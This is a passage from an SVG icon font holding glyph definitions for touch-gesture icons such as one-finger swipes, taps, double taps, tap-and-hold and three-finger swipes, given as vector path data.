272zM721.137-33.137c-120.311 0.015-191.68 65.636-248.084 160.541-125.184 210.636-214.832 307.019-180.043 341.996 35.539 35.731 122.258-41.671 188.127-112.084v361.379c0 26.82 21.49 48.168 48 48.168 26.694 0 48-21.565 48-48.168v-335.832h32v368.291c0 26.070 21.49 47.709 48 47.709 26.694 0 48-21.36 48-47.709v-336.291h32v47.794c0 26.717 21.49 48.206 48 48.206 26.694 0 48-21.583 48-48.206v-79.794h32v15.946c0 26.576 21.49 48.054 48 48.054 26.694 0 48-21.514 48-48.054v-191.946c0-132.548-107.452-240-240-240v0z" />
<glyph unicode="&#xec07;" glyph-name="two-fingers-rotate2" d="M170.212 561.906c-5.9 19.278-9.075 39.747-9.075 60.957 0 114.875 93.125 208 208 208 21.21 0 41.679-3.175 60.957-9.075v0l-83.585 83.585 22.627 22.627 113.137-113.137-33.137-33.137v-2.054c-0.453 0.232-0.908 0.462-1.364 0.69l-78.636-78.636-22.627 22.627 68.478 68.478c-14.619 3.934-29.989 6.032-45.85 6.032-97.202 0-176-78.798-176-176 0-15.861 2.098-31.232 6.032-45.85l68.478 68.478 22.627-22.627-78.636-78.636c0.228-0.456 0.458-0.91 0.69-1.364h-2.054l-33.137-33.137-113.137 113.137 22.627 22.627 83.585-83.585zM737.137 751.154c0 26.349-21.306 47.709-48 47.709-26.51 0-48-21.639-48-47.709v-368.291h-32v303.724c0 26.662-21.306 48.276-48 48.276-26.51 0-48-21.325-48-48.276v-329.271c-65.869 70.413-152.588 147.815-188.127 112.084-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.084-160.541 132.548 0 240 107.452 240 240v255.795c0 26.623-21.306 48.205-48 48.205-26.51 0-48-21.647-48-48.205v-79.795h-32v112.28c0 26.355-21.306 47.72-48 47.72-26.51 0-48-21.201-48-47.72v-80.28h-32v336.291z" />
<glyph unicode="&#xec08;" glyph-name="one-finger-swipe-left" d="M416 736h-225.6l104-104-24-24-144 144 144 144 24-24-104-104h227.23c7.468 36.683 39.718 64 78.37 64 44.491 0 80-35.938 80-80.269v-159.679c13.371 10.018 29.99 15.948 48 15.948 34.641 0 63.836-21.679 75.066-52.1 14.105 12.484 32.637 20.1 52.934 20.1 44.491 0 80-35.783 80-79.924v-0.431c13.371 10.002 29.99 15.901 48 15.901 44.491 0 80-35.819 80-80.004v-191.542c0-150.221-121.779-272-272-272-99.613 0-204.742 46.48-277.094 178.297-104.432 190.263-237.983 315.040-174.391 378.633 45.493 45.493 116.919 1.849 179.484-56.667v0 267.737zM687.96 0c132.571 0 240.040 114.727 240.040 240 0 0 0-74.024 0 0v191.946c0 26.539-21.306 48.054-48 48.054-26.51 0-48-21.478-48-48.054v-15.946h-32v79.794c0 26.623-21.306 48.206-48 48.206-26.51 0-48-21.489-48-48.206v-47.794h-32v79.794c0 26.623-21.306 48.206-48 48.206-26.51 0-48-21.489-48-48.206v-111.794h-32v335.832c0 26.602-21.306 48.168-48 48.168-26.51 0-48-21.348-48-48.168v-361.432c-65.869 70.413-152.588 147.868-188.127 112.137-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.044-160.541v0z" />
<glyph unicode="&#xec09;" glyph-name="one-finger-swipe-left2" d="M420.356 736c6.609 18.779 24.371 32 45.244 32 26.694 0 48-21.614 48-48.276v-303.724h32v144.291c0 26.070 21.49 47.709 48 47.709 26.694 0 48-21.36 48-47.709v-112.291h32v80.28c0 26.519 21.49 47.72 48 47.72 26.694 0 48-21.365 48-47.72v-112.28h32v79.795c0 26.558 21.49 48.205 48 48.205 26.694 0 48-21.582 48-48.205v-255.795c0-132.548-107.452-240-240-240-120.311 0.015-191.68 65.636-248.084 160.541-125.184 210.636-214.832 307.019-180.043 341.996 35.539 35.731 122.258-41.671 188.127-112.084v313.547h-225.6l104-104-24-24-144 144 144 144 24-24-104-104h228.356z" />
<glyph unicode="&#xec0a;" glyph-name="one-finger-swipe-right" d="M510.3 768h227.2l-104 104 24 24 144-144-144-144-24 24 104 104h-225.5v-143.9c13.4 10 30 15.9 48 15.9 34.6 0 63.8-21.7 75.1-52.1 14.1 12.5 32.6 20.1 52.9 20.1 44.5 0 80-35.8 80-79.9v-0.4c13.4 10 30 15.9 48 15.9 44.5 0 80-35.8 80-80v-191.6c0-150.2-121.8-272-272-272-99.6 0-204.7 46.5-277.1 178.3-104.4 190.3-238 315-174.4 378.6 45.5 45.5 116.9 1.8 179.5-56.7v283.5c0 44.6 35.8 80.3 80 80.3 38.9 0 70.9-27.5 78.3-64v0zM623.9 0c132.6 0 240 114.7 240 240 0 0 0-74 0 0v191.9c0 26.5-21.3 48.1-48 48.1-26.5 0-48-21.5-48-48.1v-15.9h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-47.8h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-111.8h-32v335.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.3-48-48.2v-361.4c-65.9 70.4-152.6 147.9-188.1 112.1-34.8-35 54.9-131.4 180-342 56.5-94.9 127.9-160.5 248.1-160.5v0z" />
<glyph unicode="&#xec0b;" glyph-name="one-finger-swipe-right2" d="M479.7 704v-288h32v144.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-112.3h32v80.3c0 26.5 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-112.3h32v79.8c0 26.6 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-255.8c0-132.5-107.5-240-240-240-120.3 0-191.7 65.6-248.1 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v329.3c0 27 21.5 48.3 48 48.3 21 0 38.6-13.3 45.2-32h256.7l-104 104 24 24 144-144-144-144-24 24 104 104h-253.9z" />
<glyph unicode="&#xec0c;" glyph-name="one-finger-swipe-up" d="M640 32.6c125.1 8.8 224 119.3 224 239.4 0 0 0-74 0 0v191.9c0 26.5-21.3 48.1-48 48.1-26.5 0-48-21.5-48-48.1v-15.9h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-47.8h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-111.8h-32v335.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.3-48-48.2v-361.4c-65.9 70.4-152.6 147.9-188.1 112.1-34.8-35 54.9-131.4 180-342 53.9-90.6 121.4-154.5 232.1-160.1v289.2l-104-104-24 24 144 144 144-144-24-24-104 104v-289zM896 272c0-150.2-121.8-272-272-272-99.6 0-204.7 46.5-277.1 178.3-104.4 190.3-238 315-174.4 378.6 45.5 45.5 116.9 1.8 179.5-56.7v0 283.5c0 44.6 35.8 80.3 80 80.3 44.5 0 80-35.9 80-80.3v-159.7c13.4 10 30 15.9 48 15.9 34.6 0 63.8-21.7 75.1-52.1 14.1 12.5 32.6 20.1 52.9 20.1 44.5 0 80-35.8 80-79.9v-0.4c13.4 10 30 15.9 48 15.9 44.5 0 80-35.8 80-80v-191.5z" />
<glyph unicode="&#xec0d;" glyph-name="one-finger-swipe-up2" d="M607.7 64.4c-110.7 5.6-178.2 69.5-232.1 160.1-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v329.3c0 27 21.5 48.3 48 48.3 26.7 0 48-21.6 48-48.3v-303.7h32v144.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-112.3h32v80.3c0 26.5 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-112.3h32v79.8c0 26.6 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-255.8c0-127.2-98.9-231.2-224-239.5v289.1l104-104 24 24-144 144-144-144 24-24 104 104v-289.2z" />
<glyph unicode="&#xec0e;" glyph-name="one-finger-swipe-down" d="M896 272v191.5c0 44.2-35.5 80-80 80-18 0-34.6-5.9-48-15.9v0.4c0 44.1-35.5 79.9-80 79.9-20.3 0-38.8-7.6-52.9-20.1-11.3 30.5-40.5 52.2-75.1 52.2-18 0-34.6-5.9-48-15.9v159.6c0 44.3-35.5 80.3-80 80.3-44.2 0-80-35.7-80-80.3v-283.5c-62.6 58.5-134 102.2-179.5 56.7-63.6-63.6 70-188.4 174.4-378.6 72.3-131.8 177.5-178.3 277.1-178.3 150.2 0 272 121.8 272 272v0zM640 527.8c0 26.7 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-79.8h32v15.9c0 26.6 21.5 48.1 48 48.1 26.7 0 48-21.5 48-48.1v-191.9c0-125.3-107.5-240-240-240-120.3 0-191.6 65.6-248 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v361.4c0 26.8 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-335.8h32v111.8c0 26.7 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-369.4l-104 104-24-24 144-144 144 144-24 24-104-104v337.4h-0.1z" />
<glyph unicode="&#xec0f;" glyph-name="one-finger-swipe-down2" d="M639.7 512v80.3c0 26.5 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-112.3h32v79.8c0 26.6 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-255.8c0-132.5-107.5-240-240-240-120.3 0-191.7 65.6-248.1 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v329.3c0 27 21.5 48.3 48 48.3 26.7 0 48-21.6 48-48.3v-303.7h32v144.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-401.9l-104 104-24-24 144-144 144 144-24 24-104-104v289.6z" />
<glyph unicode="&#xec10;" glyph-name="one-finger" d="M623.96 32c132.571 0 240.040 114.727 240.040 240 0 0 0-74.024 0 0v191.946c0 26.539-21.306 48.054-48 48.054-26.51 0-48-21.478-48-48.054v-15.946h-32v79.794c0 26.623-21.306 48.206-48 48.206-26.51 0-48-21.489-48-48.206v-47.794h-32v79.794c0 26.623-21.306 48.206-48 48.206-26.51 0-48-21.489-48-48.206v-111.794h-32v335.832c0 26.602-21.306 48.168-48 48.168-26.51 0-48-21.348-48-48.168v-361.432c-65.869 70.413-152.588 147.868-188.127 112.137-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.044-160.541v0 0zM896 272c0-150.221-121.779-272-272-272-99.613 0-204.742 46.48-277.094 178.297-104.432 190.263-237.983 315.040-174.391 378.633 45.493 45.493 116.919 1.849 179.484-56.667v0 283.468c0 44.576 35.817 80.269 80 80.269 44.491 0 80-35.938 80-80.269v-159.679c13.371 10.018 29.99 15.948 48 15.948 34.641 0 63.836-21.679 75.066-52.1 14.105 12.484 32.637 20.1 52.934 20.1 44.491 0 80-35.783 80-79.924v-0.431c13.371 10.002 29.99 15.901 48 15.901 44.491 0 80-35.819 80-80.004v-191.542z" />
<glyph unicode="&#xec11;" glyph-name="one-finger2" d="M607.7 624.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-144.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.4-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v112.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-80.3h-32v112.3z" />
<glyph unicode="&#xec12;" glyph-name="one-finger-double-tap" d="M601.856 599.916c24.025 33.921 38.144 75.354 38.144 120.084 0 114.875-93.125 208-208 208s-208-93.125-208-208c0-73.639 38.267-138.34 96-175.302v39.531c-39.088 32.281-64 81.117-64 135.771 0 97.202 78.798 176 176 176s176-78.798 176-176c0-42.666-15.182-81.785-40.437-112.252 12.046-0.804 23.578-3.515 34.293-7.832v0 0zM544 629.483c20.013 24.732 32 56.225 32 90.517 0 79.529-64.471 144-144 144s-144-64.471-144-144c0-34.293 11.987-65.786 32-90.517v90.796c0 61.761 50.144 111.721 112 111.721 61.73 0 112-50.019 112-111.721v-90.796zM623.96-32c132.571 0 240.040 114.727 240.040 240 0 0 0-74.024 0 0v191.946c0 26.539-21.306 48.054-48 48.054-26.51 0-48-21.478-48-48.054v-15.946h-32v79.794c0 26.623-21.306 48.206-48 48.206-26.51 0-48-21.489-48-48.206v-47.794h-32v79.794c0 26.623-21.306 48.206-48 48.206-26.51 0-48-21.489-48-48.206v-111.794h-32v335.832c0 26.602-21.306 48.168-48 48.168-26.51 0-48-21.348-48-48.168v-361.432c-65.869 70.413-152.588 147.868-188.127 112.137-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.044-160.541v0zM896 208c0-150.221-121.779-272-272-272-99.613 0-204.742 46.48-277.094 178.297-104.432 190.263-237.983 315.040-174.391 378.633 45.493 45.493 116.919 1.849 179.484-56.667v0 283.468c0 44.576 35.817 80.269 80 80.269 44.491 0 80-35.938 80-80.269v-159.679c13.371 10.018 29.99 15.948 48 15.948 34.641 0 63.836-21.679 75.066-52.1 14.105 12.484 32.637 20.1 52.934 20.1 44.491 0 80-35.783 80-79.924v-0.431c13.371 10.002 29.99 15.901 48 15.901 44.491 0 80-35.819 80-80.004v-191.542z" />
<glyph unicode="&#xec13;" glyph-name="one-finger-double-tap2" d="M586.1 635.6c13.7 25.1 21.5 53.8 21.5 84.4 0 97.2-78.8 176-176 176s-176-78.8-176-176c0-68.4 39-127.7 96-156.8v37.1c-38.6 25.8-64 69.8-64 119.8 0 79.5 64.5 144 144 144s144-64.5 144-144c0-29.8-9.1-57.5-24.6-80.5 2.8 0.3 5.7 0.5 8.6 0.5 9.4-0.1 18.3-1.7 26.5-4.5v0 0 0zM511.7 641.6c19.8 20.2 32 47.9 32 78.4 0 61.9-50.1 112-112 112s-112-50.1-112-112c0-30.5 12.2-58.2 32-78.4v78.4c0 43.9 35.8 80 80 80 44.5 0 80-35.8 80-80v-78.4zM607.7 560.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-144.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.4-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v112.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-80.3h-32v112.3z" />
<glyph unicode="&#xec14;" glyph-name="one-finger-tap" d="M544 661.5c20 24.7 32 56.2 32 90.5 0 79.5-64.5 144-144 144s-144-64.5-144-144c0-34.3 12-65.8 32-90.5v90.8c0 61.7 50.1 111.7 112 111.7 61.7 0 112-50 112-111.7v-90.8zM623.9 0c132.6 0 240 114.7 240 240 0 0 0-74 0 0v191.9c0 26.5-21.3 48.1-48 48.1-26.5 0-48-21.5-48-48.1v-15.9h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-47.8h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-111.8h-32v335.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.3-48-48.2v-361.4c-65.9 70.4-152.6 147.9-188.1 112.1-34.8-35 54.9-131.4 180-342 56.5-94.9 127.9-160.5 248.1-160.5v0zM896 240c0-150.2-121.8-272-272-272-99.6 0-204.7 46.5-277.1 178.3-104.4 190.3-238 315-174.4 378.6 45.5 45.5 116.9 1.8 179.5-56.7v0 283.5c0 44.6 35.8 80.3 80 80.3 44.5 0 80-35.9 80-80.3v-159.7c13.4 10 30 15.9 48 15.9 34.6 0 63.8-21.7 75.1-52.1 14.1 12.5 32.6 20.1 52.9 20.1 44.5 0 80-35.8 80-79.9v-0.4c13.4 10 30 15.9 48 15.9 44.5 0 80-35.8 80-80v-191.5z" />
<glyph unicode="&#xec15;" glyph-name="one-finger-tap2" d="M512 673.616c19.795 20.201 32 47.867 32 78.384 0 61.856-50.144 112-112 112s-112-50.144-112-112c0-30.517 12.205-58.183 32-78.384v78.352c0 43.906 35.817 80.032 80 80.032 44.491 0 80-35.831 80-80.032v-78.352zM608 592.291c0 26.349-21.306 47.709-48 47.709-26.51 0-48-21.639-48-47.709v-144.291h-32v303.724c0 26.662-21.306 48.276-48 48.276-26.51 0-48-21.325-48-48.276v-329.271c-65.869 70.413-152.588 147.815-188.127 112.084-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.084-160.541 132.548 0 240 107.452 240 240v255.795c0 26.623-21.306 48.205-48 48.205-26.51 0-48-21.647-48-48.205v-79.795h-32v112.28c0 26.355-21.306 47.72-48 47.72-26.51 0-48-21.201-48-47.72v-80.28h-32v112.291z" />
<glyph unicode="&#xec16;" glyph-name="one-finger-tap-hold" d="M760 768h72v32h-64v94.9c54.3-7.8 96-54.4 96-110.9 0-61.9-50.1-112-112-112s-112 50.1-112 112c0 56.4 41.7 103.1 96 110.9v-126.9h24zM624-32c-99.6 0-204.7 46.5-277.1 178.3-104.4 190.3-238 315-174.4 378.6 45.5 45.5 116.9 1.8 179.5-56.7v283.5c0 44.6 35.8 80.3 80 80.3 44.5 0 80-35.9 80-80.3v-159.7c13.4 10 30 15.9 48 15.9 34.6 0 63.8-21.7 75.1-52.1 14.1 12.5 32.6 20.1 52.9 20.1 44.5 0 80-35.8 80-79.9 13.4 9.6 30 15.5 48 15.5 44.5 0 80-35.8 80-80v-191.5c0-150.2-121.8-272-272-272v0 0 0zM623.9 0c132.6 0 240 114.7 240 240 0 0 0-74 0 0v191.9c0 26.5-21.3 48.1-48 48.1-26.5 0-48-21.5-48-48.1v-15.9h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-47.8h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-111.8h-32v335.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.3-48-48.2v-361.4c-65.9 70.4-152.6 147.9-188.1 112.1-34.8-35 54.9-131.4 180-342 56.5-94.9 127.9-160.5 248.1-160.5v0 0zM752 640c79.5 0 144 64.5 144 144s-64.5 144-144 144-144-64.5-144-144 64.5-144 144-144v0 0z" />
<glyph unicode="&#xec17;" glyph-name="one-finger-tap-hold2" d="M727.7 768h72v32h-64v94.9c54.3-7.8 96-54.4 96-110.9 0-61.9-50.1-112-112-112s-112 50.1-112 112c0 56.4 41.7 103.1 96 110.9v-126.9h24zM479.7 609.6c19.8 20.2 32 47.9 32 78.4 0 61.9-50.1 112-112 112s-112-50.1-112-112c0-30.5 12.2-58.2 32-78.4v78.4c0 43.9 35.8 80 80 80 44.5 0 80-35.8 80-80v-78.4zM719.7 640c79.5 0 144 64.5 144 144s-64.5 144-144 144-144-64.5-144-144 64.5-144 144-144v0zM575.7 528.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-144.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.4-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v112.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-80.3h-32v112.3z" />
<glyph unicode="&#xec18;" glyph-name="thumb-finger-tap" d="M352 586.517c-26.399 32.624-66.764 53.483-112 53.483-79.529 0-144-64.471-144-144 0-66.343 44.864-122.207 105.908-138.908-7.794 14.815-14.781 29.396-20.713 43.57-31.924 19.733-53.195 55.052-53.195 95.338 0 61.856 50.144 112 112 112 44.95 0 83.715-26.48 101.548-64.692 3.514-2.213 7-4.503 10.452-6.857v50.067zM576 661.483c20.013 24.732 32 56.225 32 90.517 0 79.529-64.471 144-144 144s-144-64.471-144-144c0-34.293 11.987-65.786 32-90.517v90.796c0 61.761 50.144 111.721 112 111.721 61.73 0 112-50.019 112-111.721v-90.796zM655.96 0c132.571 0 240.040 114.727 240.040 240 0 0 0-74.024 0 0v191.946c0 26.539-21.306 48.054-48 48.054-26.51 0-48-21.478-48-48.054v-15.946h-32v79.794c0 26.623-21.306 48.206-48 48.206-26.51 0-48-21.489-48-48.206v-47.794h-32v79.794c0 26.623-21.306 48.206-48 48.206-26.51 0-48-21.489-48-48.206v-111.794h-32v335.832c0 26.602-21.306 48.168-48 48.168-26.51 0-48-21.348-48-48.168v-361.432c-65.869 70.413-152.588 147.868-188.127 112.137-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.044-160.541v0zM928 240c0-150.221-121.779-272-272-272-99.613 0-204.742 46.48-277.094 178.297-104.432 190.263-237.983 315.040-174.391 378.633 45.493 45.493 116.919 1.849 179.484-56.667v0 283.468c0 44.576 35.817 80.269 80 80.269 44.491 0 80-35.938 80-80.269v-159.679c13.371 10.018 29.99 15.948 48 15.948 34.641 0 63.836-21.679 75.066-52.1 14.105 12.484 32.637 20.1 52.934 20.1 44.491 0 80-35.783 80-79.924v-0.431c13.371 10.002 29.99 15.901 48 15.901 44.491 0 80-35.819 80-80.004v-191.542z" />
<glyph unicode="&#xec19;" glyph-name="thumb-finger-tap2" d="M383.51 500.721c0.324 3.717 0.49 7.479 0.49 11.279 0 70.692-57.308 128-128 128s-128-57.308-128-128c0-68.116 53.206-123.805 120.326-127.774-8.404 12.856-16.215 25.141-23.242 36.86-37.851 12.868-65.084 48.71-65.084 90.913 0 53.019 42.981 96 96 96 47.12 0 86.311-33.948 94.449-78.72 11.162-8.815 22.243-18.462 33.061-28.559v0 0zM544 673.616c19.795 20.201 32 47.867 32 78.384 0 61.856-50.144 112-112 112s-112-50.144-112-112c0-30.517 12.205-58.183 32-78.384v78.352c0 43.906 35.817 80.032 80 80.032 44.491 0 80-35.831 80-80.032v-78.352zM640 592.291c0 26.349-21.306 47.709-48 47.709-26.51 0-48-21.639-48-47.709v-144.291h-32v303.724c0 26.662-21.306 48.276-48 48.276-26.51 0-48-21.325-48-48.276v-329.271c-65.869 70.413-152.588 147.815-188.127 112.084-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.084-160.541 132.548 0 240 107.452 240 240v255.795c0 26.623-21.306 48.205-48 48.205-26.51 0-48-21.647-48-48.205v-79.795h-32v112.28c0 26.355-21.306 47.72-48 47.72-26.51 0-48-21.201-48-47.72v-80.28h-32v112.291z" />
<glyph unicode="&#xec1a;" glyph-name="one-finger-click" d="M416 960v-128h32v128h-32zM620.9 877.5l-99.5-80.5 20.1-24.9 99.5 80.6c0 0-20.1 24.8-20.1 24.8zM685 662l-124.7 28.8-7.2-31.2 124.7-28.8 7.2 31.2zM186.1 630.8l124.7 28.8-7.2 31.2-124.7-28.8 7.2-31.2zM223 852.7l99.5-80.6 20.1 24.9-99.5 80.6-20.1-24.9zM623.9-32c132.6 0 240 114.7 240 240 0 0 0-74 0 0v191.9c0 26.5-21.3 48.1-48 48.1-26.5 0-48-21.5-48-48.1v-15.9h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-47.8h-32v79.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.5-48-48.2v-111.8h-32v335.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.3-48-48.2v-361.4c-65.9 70.4-152.6 147.9-188.1 112.1-34.8-35 54.9-131.4 180-342 56.5-94.9 127.9-160.5 248.1-160.5v0zM896 208c0-150.2-121.8-272-272-272-99.6 0-204.7 46.5-277.1 178.3-104.4 190.3-238 315-174.4 378.6 45.5 45.5 116.9 1.8 179.5-56.7v0 283.5c0 44.6 35.8 80.3 80 80.3 44.5 0 80-35.9 80-80.3v-159.7c13.4 10 30 15.9 48 15.9 34.6 0 63.8-21.7 75.1-52.1 14.1 12.5 32.6 20.1 52.9 20.1 44.5 0 80-35.8 80-79.9v-0.4c13.4 10 30 15.9 48 15.9 44.5 0 80-35.8 80-80v-191.5z" />
<glyph unicode="&#xec1b;" glyph-name="one-finger-click2" d="M416 928v-128h32v128h-32zM620.9 845.5l-99.5-80.5 20.1-24.9 99.5 80.6c0.1 0-20.1 24.8-20.1 24.8zM685.1 630l-124.7 28.8-7.2-31.2 124.7-28.8 7.2 31.2zM186.2 598.8l124.7 28.8-7.2 31.2-124.7-28.8 7.2-31.2zM223 820.7l99.5-80.6 20.1 24.9-99.5 80.6-20.1-24.9zM608 528.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-144.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.5-94.9 127.8-160.5 248.1-160.5 132.5 0 240 107.5 240 240v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v112.3c0 26.4-21.3 47.7-48 47.7-26.5 0-48-21.2-48-47.7v-80.3h-32v112.3z" />
<glyph unicode="&#xec1c;" glyph-name="three-fingers-swipe-left" d="M352 736v-235.7c-62.6 58.5-134 102.2-179.5 56.7-63.6-63.6 70-188.4 174.4-378.6 72.4-131.9 177.5-178.4 277.1-178.4 150.2 0 272 121.8 272 272v191.5c0 44.2-35.5 80-80 80-18 0-34.6-6-48-16v256.4c0 44.2-35.5 80.1-80 80.1-20.3 0-38.9-7.6-53-20.1-11.3 30.4-40.4 52.1-75 52.1-34.3 0-63.6-21.6-75-52-14.1 12.5-32.6 20-53 20-44.2 0-80-36-80-80.1v-15.9h-241.6l104 104-24 24-144-144 144-144 24 24-104 104h241.6zM624 32c-120.3 0-191.7 65.6-248.1 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v361.4c0 26.8 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-335.8h32v368.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-336.3h32v303.9c0 26.8 21.5 48.1 48 48.1 26.7 0 48-21.5 48-48.1v-335.9h32v15.9c0 26.6 21.5 48.1 48 48.1 26.7 0 48-21.5 48-48.1v-191.9c0-132.5-107.5-240-240-240v0z" />
<glyph unicode="&#xec1d;" glyph-name="three-fingers-swipe-left2" d="M192 704h225.6v-313.547c-65.869 70.413-152.588 147.815-188.127 112.084-34.789-34.977 54.859-131.36 180.043-341.996 56.404-94.905 127.773-160.526 248.084-160.541 132.548 0 240 107.452 240 240v255.795c0 26.623-21.306 48.205-48 48.205-26.51 0-48-21.647-48-48.205v-79.795h-32v304.28c0 26.355-21.306 47.72-48 47.72-26.51 0-48-21.201-48-47.72v-272.28h-32v336.291c0 26.349-21.306 47.709-48 47.709-26.51 0-48-21.639-48-47.709v-368.291h-32v303.724c0 26.662-21.306 48.276-48 48.276-20.873 0-38.635-13.221-45.244-32v0h-228.356l104 104-24 24-144-144 144-144 24 24-104 104z" />
<glyph unicode="&#xec1e;" glyph-name="three-fingers-swipe-right" d="M672 768v15.9c0 44.2-35.5 80.1-80 80.1-20.3 0-38.9-7.6-53-20.1-11.3 30.4-40.4 52.1-75 52.1-34.3 0-63.6-21.6-75-52-14.1 12.5-32.6 20-53 20-44.2 0-80-36-80-80.1v-283.6c-62.6 58.5-134 102.2-179.5 56.7-63.6-63.6 70-188.4 174.4-378.6 72.3-131.9 177.5-178.4 277.1-178.4 150.2 0 272 121.8 272 272v191.5c0 44.2-35.5 80-80 80-18 0-34.6-6-48-16v208.5h225.6l-104-104 24-24 144 144-144 144-24-24 104-104h-225.6zM528 32c-120.3 0-191.7 65.6-248.1 160.5-125.2 210.6-214.8 307-180 342 35.5 35.7 122.3-41.7 188.1-112.1v361.4c0 26.8 21.5 48.2 48 48.2 26.7 0 48-21.6 48-48.2v-335.8h32v368.3c0 26.1 21.5 47.7 48 47.7 26.7 0 48-21.4 48-47.7v-336.3h32v303.9c0 26.8 21.5 48.1 48 48.1 26.7 0 48-21.5 48-48.1v-335.9h32v15.9c0 26.6 21.5 48.1 48 48.1 26.7 0 48-21.5 48-48.1v-191.9c0-132.5-107.5-240-240-240v0z" />
<glyph unicode="&#xec1f;" glyph-name="three-fingers-swipe-right2" d="M865.3 736h-196.3c-6.5 18.6-24.2 32-45.4 32-26.5 0-48-21.2-48-47.7v-272.3h-32v336.3c0 26.3-21.3 47.7-48 47.7-26.5 0-48-21.6-48-47.7v-368.3h-32v303.7c0 26.7-21.3 48.3-48 48.3-26.5 0-48-21.3-48-48.3v-329.3c-65.9 70.4-152.6 147.8-188.1 112.1-34.8-35 54.9-131.4 180-342 56.5-94.9 127.9-160.5 248.2-160.5 132.5 0 240 107.5 240 240v255.8c0 26.6-21.3 48.2-48 48.2-26.5 0-48-21.6-48-48.2v-79.8h-32v288h193.6l-104-104 24-24 144 144-144 144-24-24 104-104z" />
